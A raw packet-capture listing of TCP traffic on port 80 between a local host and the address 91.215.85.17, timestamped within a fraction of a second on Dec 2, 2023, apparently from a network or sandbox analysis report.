                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480500937 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480515003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480531931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480545044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480559111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480592012 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480612993 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480674028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480685949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480700970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480712891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480725050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480731010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480756044 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480798960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480840921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480875015 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480906963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480921030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480933905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480942965 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480945110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480957031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480967999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480971098 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480998039 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480998039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481013060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481025934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481034040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481057882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481061935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481071949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481084108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481097937 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481127024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481168985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481201887 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481206894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481220007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481256008 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481262922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481276989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481302977 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481336117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481349945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481365919 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481378078 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481389046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481389999 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481412888 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481426954 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481468916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481483936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481518030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481626034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481640100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481702089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481719017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481729031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481734037 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481741905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481753111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481755018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481766939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481780052 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481786966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481794119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481806993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481811047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481818914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481837034 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481859922 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481868029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481941938 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481956959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481970072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481981993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.481996059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482006073 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482016087 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482018948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482043028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482059956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482105017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482119083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482131004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482155085 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482176065 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482177973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482192039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482215881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482228041 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482228041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482250929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482258081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482264996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482287884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482297897 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482378006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482393980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482407093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482418060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482430935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482431889 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482443094 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482455015 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482474089 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482475042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482508898 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482573986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482588053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482604027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482614994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482616901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482661963 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482739925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482755899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482767105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482778072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482788086 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482793093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482812881 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482815981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482846975 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482882977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482894897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482933998 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482955933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482969046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482980967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.482991934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483004093 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483036995 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483041048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483052015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483083963 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483105898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483118057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483153105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483222961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483234882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483247042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483258009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483273029 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483289957 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483302116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483314037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483335018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483339071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483347893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483378887 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483396053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483407021 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483418941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483429909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483448982 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483465910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483472109 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483515978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483526945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483537912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483549118 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483573914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483594894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483648062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483659029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483671904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483685017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483692884 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483711004 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483766079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483778000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483788967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483800888 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483820915 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483880043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483891964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483922958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483933926 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.483933926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484000921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484013081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484033108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484051943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484059095 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484062910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484075069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484086037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484107971 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484122038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484136105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484136105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484157085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484165907 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484169006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484191895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484196901 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484231949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484308958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484318972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484322071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484334946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484347105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484349966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484416008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484431028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484453917 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484474897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484477997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484487057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484508038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484519005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484587908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484589100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484600067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484611988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484623909 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484643936 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484648943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484658957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484666109 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484677076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484688997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484704018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484708071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484777927 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484792948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484807968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484818935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484829903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484847069 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484954119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484966040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.484999895 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485003948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485014915 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485025883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485038996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485049009 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485071898 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485121012 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485132933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485147953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485160112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485162973 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485178947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485186100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485213995 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485236883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485256910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485281944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485294104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485296011 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485337019 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485388994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485402107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485413074 CET804972091.215.85.17192.168.2.6
